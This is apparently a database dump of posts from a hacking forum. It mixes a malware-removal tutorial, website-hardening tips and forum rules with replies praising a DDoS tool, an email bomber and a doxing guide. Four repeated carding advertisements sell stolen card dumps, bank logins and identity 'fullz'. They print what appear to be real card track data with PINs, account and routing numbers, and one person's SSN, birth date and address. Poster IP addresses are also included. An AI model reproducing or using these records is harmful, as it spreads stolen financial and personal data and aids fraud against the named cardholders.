\'[b]Finish[/b]\'.\r\n[/list][/spoiler]\r\n\r\n[spoiler][color=#00BFFF][u][b]ESET Online Scanner[/b][/u][/color]\r\n\r\nScan your PC using [url=http://www.eset.com/onlinescan][color=#1E90FF][b]ESET Online Scanner[/b][/color][/url]\r\n\r\nhttp://www.eset.com/onlinescan\r\n[list][*]Go to the ESET link using Internet Explorer to run the scanner through your browser (other browsers require you to download)\r\n[*]The process is easy, just use the default settings and proceed to the scan\r\n[*]It will automatically update it\'s databases. (If you are using for the second (or later) time, update process maybe faster)\r\n[*]After scan is complete, remove all infections and click \"Finish\"\r\n[*]Finally, close the browser window.\r\n[/list]\r\n[b]IMPORTANT:[/b] Administrator privileges are required to run ESET Online Scanner.[/spoiler]\r\n\r\n[color=#32CD32][b]If no infections are found:[/b][/color]\r\n\r\nIf no infections are found, there can be two possible explanations.\r\n\r\n[b]1. The keylogger is FUD:[/b]\r\n\r\nFUD means Fully Undetectable/Undetected. This means that no anti-virus can detect the infection. If true, don\'t panic, there is still one solution:\r\n\r\n[list]\r\n [*] Download [url=http://www.trendsecure.com/portal/en-US/threat_analytics/hijackthis.php][color=#00BFFF][b]HijackThis from TrendMicro[/b][/color][/url].\r\n [*] Install it and run it.\r\n [*] Click [b]Do a system scan and save log file[/b]\r\n [*] When the Notepad pops up, copy and paste the contents of the log into a new thread that you make on L33THacking ( to be more specific, In the HJT Logs Analysis Section). Title the thread [HJT log][your problem].\r\n [list][*] An example of such a thread would be:[/list]\r\n\r\n [*] [i]Do [color=#FF4500]NOT[/color] fix anything it finds there yet, as most of the entries listed in the log are legit and necessary for a smooth and stable running of your system.[/i]\r\n [*] Do not download or install any new software as it will hinder the analysis of your log.[/list]\r\nThis makes it easier on the HJT Team to identify people who are in need of help.\r\n\r\nOnce a helper has jumped into the thread, do [color=#FF0000]NOT[/color] post until the helper has given the ALL CLEAN or cannot help the user, as incorrect and/or amateur actions can damage your computer even more.\r\n\r\n[b]2. You aren\'t infected:[/b]\r\n\r\nYou are in luck. You aren\'t infected by a keylogger. This can be true if a few of your symptoms aren\'t met. If you still see the symptoms, then the situation is probably Number 1.', '41.174.6.147', '699270803', '0', '0', '0', '0', '1', '633b1f3e42d57b738ad46ec46feea56c', '0', '0'); INSERT INTO mybb_posts VALUES('150', '61', '147', '23', 'RE: [Tutorial] Prevention of Infection', '0', '5', 'Timmy', '1343948116', 'Nice tutorial on prevention of viruses etc.\n\nThanks', '41.174.6.147', '699270803', '1', '0', '0', '0', '1', '9f5ba23855723a8cb0ccdf3bcbc72e7f', '0', '0'); INSERT INTO mybb_posts VALUES('151', '64', '0', '23', 'Securing your website', '0', '5', 'Timmy', '1343948298', '[size=large][b]Seven Ways to Protect Your Website From Hackers[/b][/size]\r\n\r\n\r\nThose of us who are hackers would be offended by the article\'s title. Hackers are ethical testers to find faults in systems so they can be corrected before unethical hackers (crackers) exploit them. So, this articles is really about how to protect your website from crackers.\r\n\r\n[b][color=#A9A9A9][u]Keep your files up to date[/u][/color][/b]. If your site uses the popular SendMail script, please be sure your version is a current one. Visit [url=http://www.sendmail.org/support/antispam]Anti-Spam Provisions in Sendmail 8.8[/url] to edit the FormMail script. We have the updated SendMail in use for the Harley Shopping Cart site. FormMail is another popular script used to send form results to an email address or database. We use that file for our website form. These scripts are located in the cgi-bin on the web host server.\r\n\r\nSigning up for updates for scripts (programs) your site uses will let you know if there are any. You should use the latest update to protect yourself. This is often the reason the update is released. If you are unsure of the scripts used on your website, contact your web developer.\r\n\r\n[b][color=#A9A9A9][u]Remove unnecessary files[/u][/color][/b].s your website changes, old files are ignored. They should be removed. Keep copies offline in case you wish to add them again, but remember to update any scripts. Old files are often indexed by search engines. So even if you do not link to those pages anymore, the search engines lists them for Internet users to find and visit. Automated programs to search for these files can find them to exploit them.\r\n\r\n[b][color=#A9A9A9][u]Implement passwords[/u][/color][/b].Any sensitive files, databases or scripts should be protected. Please use passwords that are difficult to guess. Use letters AND numbers, but be careful to keep the number of characters within the programmed limits and remember that passwords are case-sensitive.\r\n\r\n[b][color=#A9A9A9][u]Include robots.txt[/u][/color][/b] .Create a file to tell search engines not to index files that are restricted to certain users. You can also disallow indexing of images, so people who search for images to use illegal do not steal your images.\r\n\r\n[b][color=#A9A9A9][u]Check permissions of uploaded file[/u][/color][/b]s . Left-click each filename in your web host server, then right-click and select CHMOD to make sure files are set to the proper permissions. Check with your web host if you are unsure. Remember to upload images as binary and most other files as ASCII files. Choosing Auto for automatic selection may be incorrect if certain extensions are not specified.\r\n\r\n[b][u][color=#A9A9A9]Protect email addresses[/color][/u][/b] . If you ever got a strange email that tested your form or simply sent you an email to yourself, one of those spammer programs found your email address from your website or someone else\'s. There are scripts to split up your email address, so spammer software programs cannot read them. Another way is to place your email address in an image or simply have an \"[i][u]Email us[/u][/i]\" link. I haven\'t done this, but I didn\'t have any problems until recently. I still want to make my contact information visible to my target audience.\r\n\r\nIf you sign guestbooks, go to forums or newsgroups, or share your email address with anyone else, your email address can be posted and shared all over the Internet. I often use several email addresses when making posts, because spammers look there first for email addresses. To spammers, a guestbook is an email address database. So use a Hotmail account for your email, but you can still include your web address in your signature. If the Internet user visits your site, the user can contact you using the link on your site. The spammers probably won\'t visit your site, so the spam goes to the posted email address.\r\n\r\n[b][color=#A9A9A9][u]Protect your source code[/u][/color][/b] . Some people use that stupid right-click script to protect their source code. Not only does that not protect your code, you are disabling browser functions such as adding your site to their favorites or printing. Though many people have \"borrowed\" my source code, I would not want to disable functions that my target audience wants to use. There are scripts to make your source code hidden. This is more effective, but a pain for anyone who wants to edit your site. The preferred method is external files such as external style sheets or javascript files.\r\n\r\nInclude copyright information on the page and in the meta tags for every web page. Watermark all images. Keep copies of previous versions of your site with the last modified information intact. Save files on disks, so they can be retrieved. if necessary. Visit the [url=http://www.archive.org/index.php]WayBack Machine[/url]o find previous versions of websites, if you cannot find your files. Though the information is incomplete, it is better than nothing. Buy the copyrights to important files to protect yourself from competitors or other parties.', '41.174.6.147', '699270803', '1', '0', '0', '0', '1', '78090d0f04ce2ffd6b6d81155470526f', '0', '0'); INSERT INTO mybb_posts VALUES('152', '10', '21', '5', 'RE: [tut]How to moderate L33THacking', '0', '1', 't3h jok3r', '1343949097', 'Updated. Added merge users at the bottom of the tutorial.', '41.174.14.148', '699272852', '1', '0', '0', '0', '1', '48e561f52a2bbd29be6f5aa34fd909fb', '0', '0'); INSERT INTO mybb_posts VALUES('153', '50', '132', '12', 'RE: [tut]How to DOX', '0', '9', 'p420', '1343950521', 'Thanks for this DOXing tutorial. I found it very helpful.', '41.174.14.148', '699272852', '0', '0', '0', '0', '1', '2a1374943d646405eda3c5dbcb14b660', '0', '0'); INSERT INTO mybb_posts VALUES('154', '48', '125', '21', 'RE: [Strong] Anonymous DoSer _z0r0_in C #', '0', '9', 'p420', '1343950858', 'Best DDoSer in my opinion.', '41.174.14.148', '699272852', '0', '0', '0', '0', '1', '7f67ac753ed3ecad0fe37ccd95e138b1', '0', '0'); INSERT INTO mybb_posts VALUES('156', '65', '0', '41', 'Auction Thread Guidelines', '0', '1', 't3h jok3r', '1343951507', 'All auctions thread must follow this template format:\r\n\r\n[code]\r\n[b]Start Bid:[/b]\r\n[b]Buy It Now:[/b]\r\n[b]Quantity:[/b]\r\n[b]End Date:[/b] (Post with time zone e.g. 10:00 PM PST)\r\n[b]Description:[/b]\r\n[b]Accepted Payment Methods:[/b]\r\n[b]Additional Stipulations and Requirements:[/b]\r\n[/code]\r\n\r\nRules\r\n==\r\n1. All bids must be in threads. No PM bidding.\r\n2. You can not cancel your bid if you are the last bidder.', '41.174.14.148', '699272852', '1', '0', '0', '0', '1', '5302438c5f36177c5358b87ae296aea9', '0', '0'); INSERT INTO mybb_posts VALUES('157', '66', '0', '63', 'Read this thread before you make a Request!', '0', '4', 'Triple H', '1343951621', '[align=center][img]http://gfxf.net/upload/images/UQGW.png[/img]\n\n[img]http://cdn1.iconfinder.com/data/icons/BRILLIANT/construction/png/72/brush.png[/img]\n[color=#00BFFF][size=large][b]About[/b][/size][/color]\nForum Graphic Requests is made & added in Graphics tab,\nso other members can request any graphics they need,\nbecause there is a lot of talented members on L33THacking,\neither they are willing to pay or they don\'t have enough\nmoney to pay, so they can request work for free.\n\n[color=#00BFFF][size=large][b]Making a Request[/b][/size][/color]\nIf you decided to make a request thread, please use any kind of a template,\nand also please try to avoid any spam, short, unrelated or off-topic posts\nbecause it will be deleted.So I recommend you to put your contact info\nin the thread or contact any member via PM who wants to give it a try.\nAlso one of the most important things is, when ever you make a request\nplease say Thanks in Advance or any kind of thanking, especially if you\nare requesting free graphics.\n\n[spoiler=Template Example]\n[color=#00BFFF][b]Size:[/b][/color] 123x456\n[color=#00BFFF][b]Colour Scheme:[/b][/color] Black\n[color=#00BFFF][b]Render/Image:[/b][/color] http://testlink\n[color=#00BFFF][b]Text:[/b][/color] Username\n[color=#00BFFF][b]Anything else:[/b][/color] Sparks\n[size=xx-small]Thanks to [url=http://l33thacking.net/member.php?action=profile&uid=20]JakeUS[/url] for template sample.[/size]\n\n[b][color=#FF0000]NOTE:[/color] This template is just an example, you don\'t have to use it.\nYou can use your own, or simply explain everything you need in thread,\nunless you want ordered work to stay private.[/b]\n[/spoiler]\n\n[color=#00BFFF][size=large][b]Expectations[/b][/size][/color]\nAfter you made a thread only thing left is to wait.If none responds to\nyour thread after a week or more, please close it or junk it and simply\nmake a new one. In case you cannot do that please contact any\n[url=http://l33thacking.net/showteam.php]Staff Member[/url] about that.Also after you posted a thread, please\ndo not expect a \"Professional Work\" if you are offering something like 5$\nor less, or even when you request a free work.To purchase professional\nwork, you will probably need to pay more & to find a experienced artist.\n\n[color=#00BFFF][size=large][b]About Rules[/b][/size][/color]\nAny Rulebreaking or even other mistake in thread can affect to it.\nThat means your thread can be: Closed, Deleted or Junked.\nAlso no Double Posting or Adult Content in this forum.[/align]', '41.174.14.148', '699272852', '1', '0', '1', '1347249099', '1', 'd1d6104af608be6951890c216a9d04de', '0', '1347249099'); INSERT INTO mybb_posts VALUES('1763', '374', '1735', '19', '[Junk]PLEASE DELETE', '0', '1', 't3h jok3r', '1347249273', 'This thread has been junked.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('158', '2', '4', '34', 'RE: Userbar tut', '0', '4', 'Triple H', '1343951801', 'Nice tutorial, unfortunately I\'m not into graphics.', '41.174.14.148', '699272852', '1', '0', '0', '0', '1', 'bc888b9e633924aa38dc55bc4749467d', '0', '0'); INSERT INTO mybb_posts VALUES('159', '57', '141', '18', 'RE: Hackyer\'s Email Bomber V1.0', '0', '17', 'khade009', '1343951998', 'Nice bomber. Thanks for contributing to the community.', '41.174.14.148', '699272852', '0', '0', '0', '0', '1', 'b17cdd394381059d878b4f64cf811bd7', '0', '0'); INSERT INTO mybb_posts VALUES('160', '67', '0', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '4', '6', 'codeshop', '1343987223', 'Hello Everybody,\r\nI have In stock Dumps,logins,Paypal,cvv,fullz,Wu trf..\r\nContact me:\r\nY:m: Codeshopcc@yahoo.com\r\nY:d: Codeshopcc\r\nICQ: 643549928\r\n\r\n(I DO WESTERN UNION TRANSFER!! DO CONTACT ME TO ASK ME FOR THAT)\r\nI am NOT a scammer from Vietnam!(chat with me in English for being sure):cool:\r\n\r\nRecord #00928...\r\nTue Oct 16 08:54:42 2007\r\nTrack 1: B4313084818968669^techer/limicher^0809201000000000000002070000000\r\nTrack 2: 4313084818968669=08092010000000000001\r\nTrack 3: ;?\r\nPIN:5407\r\n\r\n--------------------------------------------------------------------------- ----\r\nRecord #00929...\r\nTue Oct 16 08:56:05 2007\r\nTrack 1: B5120255004093674^gorge linuz^0909201225000000000000000000000\r\nTrack 2: 5120255004093674=09092012250000000000\r\nTrack 3: ;?\r\nPIN:0843\r\n\r\n\r\n--------------------------------------------------------------------------- ----\r\nRecord #000930...\r\nTue Oct 16 08:56:14 2007\r\nTrack 1: B5458001140057948^FAZAKERLEY/ANDREW.MR ^09022013570000000000\r\nTrack 2: 5458001140057948=09022013570000000001\r\nTrack 3: ;?\r\nPIN: 5761\r\n\r\n--------------------------------------------------------------------------\r\n\r\nTrack1 : B4453263304007113^CANELOS/ALICIA M^08071011865200511000000\r\nTrack2 : 4453263304007113=080710118652511\r\n\r\nB4557045535895068^KANINA BANNER PTY LTD ^111020100000 0000000375000000? 4557045535895068=11102010000037500000\r\n³6436535702470^MR MATTHEW T BAXTER ^11041010804 446? ;36436535702470=11041010804000446? 11/12/2008 17:51 ´715149921033372^MS JENNIFER WILLIAMS ^0904201633723372000000340000000? ;4715149921033372=09042016337233723400? 11/15/2008 12:10 ³760 105217 11155^CRAINE/BRENT ^0911061196631? ;376010521711155=0911061196631? 11/18/2008 21:28 ;4072209019630880=09102012138430885800? 11/2/2008 12:43 ´072200010613256^MR AARON JAMES RITCHIE ^1110201632563256000000344000000? ;4072200010613256=11102016325632563440 \r\n\r\nAmount To Pay For That Depend On Amount You Want To Transfer\r\n\r\nValid and Good Uk,Eu,Asia Fullz with Dob,mmn,ssn,drivers license.\r\nCC fullz info, CC DOB....Domain hosting.\r\n1 US (visa,master) = 3 $ ( buy > 50 Price $2/ 1cvv)\r\n1 US (Amex,dis) = 4 $ ( buy > 50 price $3 /1cvv)\r\n1 UK = 5 $ ( Buy > 50 price 4$/1cvv)\r\n1 UK (with DOB ) = 15 $ ( Buy > 50 CVV Price 12$ = 1CVV)\r\n1 Ca = 10 $\r\n1 CA (Amex,dis) = 15 $\r\n1 EU = 15 $\r\n1 EU (Amex,dis) = 17 $\r\n1 US (full info) = 80 $\r\n1 UK (full info) = 100$\r\nAustralia (AU) = 10 $\r\nSwitzerland (VE) = 15 $\r\nFrance (FR) = 15 $\r\nGermany (GE) = 15 $\r\nMexico (MX) = 12 $\r\nNew Zealand (NZ) = 13 $\r\nITALY = 15 $\r\n\r\nI SELL MANY SHOPADMINS\r\n| Excellent Services | Great Products\r\n\r\nI can registrer for u, or i can pass to u others accounts i have already activate !\r\nI can registrer for u,just onething u pay for this!\r\n\r\nDemo fullz cc\r\nAccount Open In: MD\r\nOnline ID: rgunn1a\r\nATM or Check Card PIN: 001755\r\nPasscode: eg15\r\n---------------Credit/Debit Card and Other Accounts\r\nDetails------------\r\nCC Number: 4888936039374958\r\nExp Date: 05/2010\r\nCvv: 545\r\nCC PinNumber: eg15\r\nAccount Number: 052001633\r\nRouting Number: 446010365904\r\n---------------Credit/Debit Card ---------------\r\nFull Name: bob gunn\r\nAddress Line 1: 808 lowe rd\r\nAddress Line 2:\r\nCity: middle river\r\nState: MD\r\nZipcode: 21220\r\nPhone Number:\r\nE-mail: rg.gunn\r\n---------------Identification---------------------\r\nSSN: 216-60-8382\r\nDOB: 04-04-1953\r\nMMN: pinkney\r\nDriver\'s Liecence No: g50076753097\r\n\r\nI have : us bins: 517805,488893,542432\r\nuk bins: 4547,5506,5569,5404,5031,4921,5505,5506,4921,4550\r\nger bins: 492942,490762,530127\r\naus bins: 543568,450605,494053,450606,456475,521893,519163\r\nand others bins for others country.....\r\n\r\n+ I can check balance in cvv, balance will be as good as you expect\r\nand price follow of agreements .\r\n\r\n+ All my cvv are tested before sell, that\'s sure.\r\n\r\n(I DO WESTERN UNION TRANSFER!! DO CONTACT ME TO ASK ME FOR THAT)\r\n.............................................................................\r\n\r\nI ACCEPT ONLY: WESTERN UNION - MONEY GRAM - LIBERTY RESERVE - UKASH\r\n\r\nI ALSO SELL IN BULK\r\nYOU CAN CONTACT ME IF YOU WANT TO BUY BULK FOR YOUR SHOP ADMINS.\r\nREAD MY THREAD WELL BEFORE YOU ADD ME\r\nIF YOU ASK FOR TEST I WONT GIVE YOU AND SAMPLE.\r\n\r\nY:m:Codeshopcc @yahoo.com\r\nY:d: Codeshopcc\r\nIcq: 643549928\r\nTHANKS TO YOU ALL.CONTACT ME FOR GOOD BUSINESS', '172.129.54.247', '-1400817929', '0', '0', '0', '0', '1', 'c453f28bbd8e40267dcb71e539b23816', '0', '0'); INSERT INTO mybb_posts VALUES('161', '68', '0', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '4', '6', 'codeshop', '1343987480', 'Hello Everybody,\r\nI have In stock Dumps,logins,Paypal,cvv,fullz,Wu trf..\r\nContact me:\r\nY:m: Codeshopcc@yahoo.com\r\nY:d: Codeshopcc\r\nICQ: 643549928\r\n\r\n(I DO WESTERN UNION TRANSFER!! DO CONTACT ME TO ASK ME FOR THAT)\r\nI am NOT a scammer from Vietnam!(chat with me in English for being sure):cool:\r\n\r\nRecord #00928...\r\nTue Oct 16 08:54:42 2007\r\nTrack 1: B4313084818968669^techer/limicher^0809201000000000000002070000000\r\nTrack 2: 4313084818968669=08092010000000000001\r\nTrack 3: ;?\r\nPIN:5407\r\n\r\n--------------------------------------------------------------------------- ----\r\nRecord #00929...\r\nTue Oct 16 08:56:05 2007\r\nTrack 1: B5120255004093674^gorge linuz^0909201225000000000000000000000\r\nTrack 2: 5120255004093674=09092012250000000000\r\nTrack 3: ;?\r\nPIN:0843\r\n\r\n\r\n--------------------------------------------------------------------------- ----\r\nRecord #000930...\r\nTue Oct 16 08:56:14 2007\r\nTrack 1: B5458001140057948^FAZAKERLEY/ANDREW.MR ^09022013570000000000\r\nTrack 2: 5458001140057948=09022013570000000001\r\nTrack 3: ;?\r\nPIN: 5761\r\n\r\n--------------------------------------------------------------------------\r\n\r\nTrack1 : B4453263304007113^CANELOS/ALICIA M^08071011865200511000000\r\nTrack2 : 4453263304007113=080710118652511\r\n\r\nB4557045535895068^KANINA BANNER PTY LTD ^111020100000 0000000375000000? 4557045535895068=11102010000037500000\r\n³6436535702470^MR MATTHEW T BAXTER ^11041010804 446? ;36436535702470=11041010804000446? 11/12/2008 17:51 ´715149921033372^MS JENNIFER WILLIAMS ^0904201633723372000000340000000? ;4715149921033372=09042016337233723400? 11/15/2008 12:10 ³760 105217 11155^CRAINE/BRENT ^0911061196631? ;376010521711155=0911061196631? 11/18/2008 21:28 ;4072209019630880=09102012138430885800? 11/2/2008 12:43 ´072200010613256^MR AARON JAMES RITCHIE ^1110201632563256000000344000000? ;4072200010613256=11102016325632563440 \r\n\r\nValid and Good Uk,Eu,Asia Fullz with Dob,mmn,ssn,drivers license.\r\nCC fullz info, CC DOB....Domain hosting.\r\n1 US (visa,master) = 3 $ ( buy > 50 Price $2/ 1cvv)\r\n1 US (Amex,dis) = 4 $ ( buy > 50 price $3 /1cvv)\r\n1 UK = 5 $ ( Buy > 50 price 4$/1cvv)\r\n1 UK (with DOB ) = 15 $ ( Buy > 50 CVV Price 12$ = 1CVV)\r\n1 Ca = 10 $\r\n1 CA (Amex,dis) = 15 $\r\n1 EU = 15 $\r\n1 EU (Amex,dis) = 17 $\r\n1 US (full info) = 80 $\r\n1 UK (full info) = 100$\r\nAustralia (AU) = 10 $\r\nSwitzerland (VE) = 15 $\r\nFrance (FR) = 15 $\r\nGermany (GE) = 15 $\r\nMexico (MX) = 12 $\r\nNew Zealand (NZ) = 13 $\r\nITALY = 15 $\r\n\r\nI SELL MANY SHOPADMINS\r\n| Excellent Services | Great Products\r\n\r\nI can registrer for u, or i can pass to u others accounts i have already activate !\r\nI can registrer for u,just onething u pay for this!\r\n\r\nDemo fullz cc\r\nAccount Open In: MD\r\nOnline ID: rgunn1a\r\nATM or Check Card PIN: 001755\r\nPasscode: eg15\r\n---------------Credit/Debit Card and Other Accounts\r\nDetails------------\r\nCC Number: 4888936039374958\r\nExp Date: 05/2010\r\nCvv: 545\r\nCC PinNumber: eg15\r\nAccount Number: 052001633\r\nRouting Number: 446010365904\r\n---------------Credit/Debit Card ---------------\r\nFull Name: bob gunn\r\nAddress Line 1: 808 lowe rd\r\nAddress Line 2:\r\nCity: middle river\r\nState: MD\r\nZipcode: 21220\r\nPhone Number:\r\nE-mail: rg.gunn\r\n---------------Identification---------------------\r\nSSN: 216-60-8382\r\nDOB: 04-04-1953\r\nMMN: pinkney\r\nDriver\'s Liecence No: g50076753097\r\n\r\nI have : us bins: 517805,488893,542432\r\nuk bins: 4547,5506,5569,5404,5031,4921,5505,5506,4921,4550\r\nger bins: 492942,490762,530127\r\naus bins: 543568,450605,494053,450606,456475,521893,519163\r\nand others bins for others country.....\r\n\r\n+ I can check balance in cvv, balance will be as good as you expect\r\nand price follow of agreements .\r\n\r\n+ All my cvv are tested before sell, that\'s sure.\r\n\r\n(I DO WESTERN UNION TRANSFER!! DO CONTACT ME TO ASK ME FOR THAT)\r\n.............................................................................\r\n\r\nI ACCEPT ONLY: WESTERN UNION - MONEY GRAM - LIBERTY RESERVE - UKASH\r\n\r\nI ALSO SELL IN BULK\r\nYOU CAN CONTACT ME IF YOU WANT TO BUY BULK FOR YOUR SHOP ADMINS.\r\nREAD MY THREAD WELL BEFORE YOU ADD ME\r\nIF YOU ASK FOR TEST I WONT GIVE YOU AND SAMPLE.\r\n\r\nY:m:Codeshopcc @yahoo.com\r\nY:d: Codeshopcc\r\nIcq: 643549928\r\nTHANKS TO YOU ALL.CONTACT ME FOR GOOD BUSINESS', '172.129.54.247', '-1400817929', '0', '0', '0', '0', '1', 'eebf51f3bca7507254d9968c55002b0d', '0', '0'); INSERT INTO mybb_posts VALUES('162', '69', '0', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '4', '6', 'codeshop', '1343987819', 'Hello Everybody,\r\nI have In stock Dumps,Bank logins,Paypal,cvv,fullz,Wu trf..\r\nContact me:\r\nY:m: Codeshopcc@yahoo.com\r\nY:d: Codeshopcc\r\nICQ: 643549928\r\n\r\n(I DO WESTERN UNION TRANSFER!! DO CONTACT ME TO ASK ME FOR THAT)\r\nI am NOT a scammer from Vietnam!(chat with me in English for being sure):cool:\r\n\r\nRecord #00928...\r\nTue Oct 16 08:54:42 2007\r\nTrack 1: B4313084818968669^techer/limicher^0809201000000000000002070000000\r\nTrack 2: 4313084818968669=08092010000000000001\r\nTrack 3: ;?\r\nPIN:5407\r\n\r\n--------------------------------------------------------------------------- ----\r\nRecord #00929...\r\nTue Oct 16 08:56:05 2007\r\nTrack 1: B5120255004093674^gorge linuz^0909201225000000000000000000000\r\nTrack 2: 5120255004093674=09092012250000000000\r\nTrack 3: ;?\r\nPIN:0843\r\n\r\n\r\n--------------------------------------------------------------------------- ----\r\nRecord #000930...\r\nTue Oct 16 08:56:14 2007\r\nTrack 1: B5458001140057948^FAZAKERLEY/ANDREW.MR ^09022013570000000000\r\nTrack 2: 5458001140057948=09022013570000000001\r\nTrack 3: ;?\r\nPIN: 5761\r\n\r\n--------------------------------------------------------------------------\r\n\r\nTrack1 : B4453263304007113^CANELOS/ALICIA M^08071011865200511000000\r\nTrack2 : 4453263304007113=080710118652511\r\n\r\nB4557045535895068^KANINA BANNER PTY LTD ^111020100000 0000000375000000? 4557045535895068=11102010000037500000\r\n³6436535702470^MR MATTHEW T BAXTER ^11041010804 446? ;36436535702470=11041010804000446? 11/12/2008 17:51 ´715149921033372^MS JENNIFER WILLIAMS ^0904201633723372000000340000000? ;4715149921033372=09042016337233723400? 11/15/2008 12:10 ³760 105217 11155^CRAINE/BRENT ^0911061196631? ;376010521711155=0911061196631? 11/18/2008 21:28 ;4072209019630880=09102012138430885800? 11/2/2008 12:43 ´072200010613256^MR AARON JAMES RITCHIE ^1110201632563256000000344000000? ;4072200010613256=11102016325632563440 \r\n\r\nValid and Good Uk,Eu,Asia Fullz with Dob,mmn,ssn,drivers license.\r\nCC fullz info, CC DOB....Domain hosting.\r\n1 US (visa,master) = 3 $ ( buy > 50 Price $2/ 1cvv)\r\n1 US (Amex,dis) = 4 $ ( buy > 50 price $3 /1cvv)\r\n1 UK = 5 $ ( Buy > 50 price 4$/1cvv)\r\n1 UK (with DOB ) = 15 $ ( Buy > 50 CVV Price 12$ = 1CVV)\r\n1 Ca = 10 $\r\n1 CA (Amex,dis) = 15 $\r\n1 EU = 15 $\r\n1 EU (Amex,dis) = 17 $\r\n1 US (full info) = 80 $\r\n1 UK (full info) = 100$\r\nAustralia (AU) = 10 $\r\nSwitzerland (VE) = 15 $\r\nFrance (FR) = 15 $\r\nGermany (GE) = 15 $\r\nMexico (MX) = 12 $\r\nNew Zealand (NZ) = 13 $\r\nITALY = 15 $\r\n\r\nI SELL MANY SHOPADMINS\r\n| Excellent Services | Great Products\r\n\r\nI can registrer for u, or i can pass to u others accounts i have already activate !\r\nI can registrer for u,just onething u pay for this!\r\n\r\nDemo fullz cc\r\nAccount Open In: MD\r\nOnline ID: rgunn1a\r\nATM or Check Card PIN: 001755\r\nPasscode: eg15\r\n---------------Credit/Debit Card and Other Accounts\r\nDetails------------\r\nCC Number: 4888936039374958\r\nExp Date: 05/2010\r\nCvv: 545\r\nCC PinNumber: eg15\r\nAccount Number: 052001633\r\nRouting Number: 446010365904\r\n---------------Credit/Debit Card ---------------\r\nFull Name: bob gunn\r\nAddress Line 1: 808 lowe rd\r\nAddress Line 2:\r\nCity: middle river\r\nState: MD\r\nZipcode: 21220\r\nPhone Number:\r\nE-mail: rg.gunn\r\n---------------Identification---------------------\r\nSSN: 216-60-8382\r\nDOB: 04-04-1953\r\nMMN: pinkney\r\nDriver\'s Liecence No: g50076753097\r\n\r\nI have : us bins: 517805,488893,542432\r\nuk bins: 4547,5506,5569,5404,5031,4921,5505,5506,4921,4550\r\nger bins: 492942,490762,530127\r\naus bins: 543568,450605,494053,450606,456475,521893,519163\r\nand others bins for others country.....\r\n\r\n+ I can check balance in cvv, balance will be as good as you expect\r\nand price follow of agreements .\r\n\r\n+ All my cvv are tested before sell, that\'s sure.\r\n\r\n(I DO WESTERN UNION TRANSFER!! DO CONTACT ME TO ASK ME FOR THAT)\r\n.............................................................................\r\n\r\nI ACCEPT ONLY: WESTERN UNION - MONEY GRAM - LIBERTY RESERVE - UKASH\r\n\r\nI ALSO SELL IN BULK\r\nYOU CAN CONTACT ME IF YOU WANT TO BUY BULK FOR YOUR SHOP ADMINS.\r\nREAD MY THREAD WELL BEFORE YOU ADD ME\r\nIF YOU ASK FOR TEST I WONT GIVE YOU AND SAMPLE.\r\n\r\nY:m:Codeshopcc @yahoo.com\r\nY:d: Codeshopcc\r\nIcq: 643549928\r\nTHANKS TO YOU ALL.CONTACT ME FOR GOOD BUSINESS', '172.129.54.247', '-1400817929', '0', '0', '0', '0', '1', '9308c6417efa1f056034ab66a45a63a2', '0', '0'); INSERT INTO mybb_posts VALUES('163', '70', '0', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '4', '6', 'codeshop', '1343987972', 'Hello Everybody,\r\nI have In stock Dumps,Bank logins,Paypal,cvv,fullz,Wu trf..\r\nContact me:\r\nY:m: Codeshopcc@yahoo.com\r\nY:d: Codeshopcc\r\nICQ: 643549928\r\n\r\n(I DO WESTERN UNION TRANSFER!! DO CONTACT ME TO ASK ME FOR THAT)\r\nI am NOT a scammer from Vietnam!(chat with me in English for being sure):cool:\r\n\r\nRecord #00928...\r\nTue Oct 16 08:54:42 2007\r\nTrack 1: B4313084818968669^techer/limicher^0809201000000000000002070000000\r\nTrack 2: 4313084818968669=08092010000000000001\r\nTrack 3: ;?\r\nPIN:5407\r\n\r\n--------------------------------------------------------------------------- ----\r\nRecord #00929...\r\nTue Oct 16 08:56:05 2007\r\nTrack 1: B5120255004093674^gorge linuz^0909201225000000000000000000000\r\nTrack 2: 5120255004093674=09092012250000000000\r\nTrack 3: ;?\r\nPIN:0843\r\n\r\n\r\n--------------------------------------------------------------------------- ----\r\nRecord #000930...\r\nTue Oct 16 08:56:14 2007\r\nTrack 1: B5458001140057948^FAZAKERLEY/ANDREW.MR ^09022013570000000000\r\nTrack 2: 5458001140057948=09022013570000000001\r\nTrack 3: ;?\r\nPIN: 5761\r\n\r\n--------------------------------------------------------------------------\r\n\r\nTrack1 : B4453263304007113^CANELOS/ALICIA M^08071011865200511000000\r\nTrack2 : 4453263304007113=080710118652511\r\n\r\nB4557045535895068^KANINA BANNER PTY LTD ^111020100000 0000000375000000? 4557045535895068=11102010000037500000\r\n³6436535702470^MR MATTHEW T BAXTER ^11041010804 446? ;36436535702470=11041010804000446? 11/12/2008 17:51 ´715149921033372^MS JENNIFER WILLIAMS ^0904201633723372000000340000000? ;4715149921033372=09042016337233723400? 11/15/2008 12:10 ³760 105217 11155^CRAINE/BRENT ^0911061196631? ;376010521711155=0911061196631? 11/18/2008 21:28 ;4072209019630880=09102012138430885800? 11/2/2008 12:43 ´072200010613256^MR AARON JAMES RITCHIE ^1110201632563256000000344000000? ;4072200010613256=11102016325632563440 \r\n\r\n\r\nValid and Good Uk,Eu,Asia Fullz with Dob,mmn,ssn,drivers license.\r\nCC fullz info, CC DOB....Domain hosting.\r\n1 US (visa,master) = 3 $ ( buy > 50 Price $2/ 1cvv)\r\n1 US (Amex,dis) = 4 $ ( buy > 50 price $3 /1cvv)\r\n1 UK = 5 $ ( Buy > 50 price 4$/1cvv)\r\n1 UK (with DOB ) = 15 $ ( Buy > 50 CVV Price 12$ = 1CVV)\r\n1 Ca = 10 $\r\n1 CA (Amex,dis) = 15 $\r\n1 EU = 15 $\r\n1 EU (Amex,dis) = 17 $\r\n1 US (full info) = 80 $\r\n1 UK (full info) = 100$\r\nAustralia (AU) = 10 $\r\nSwitzerland (VE) = 15 $\r\nFrance (FR) = 15 $\r\nGermany (GE) = 15 $\r\nMexico (MX) = 12 $\r\nNew Zealand (NZ) = 13 $\r\nITALY = 15 $\r\n\r\nI 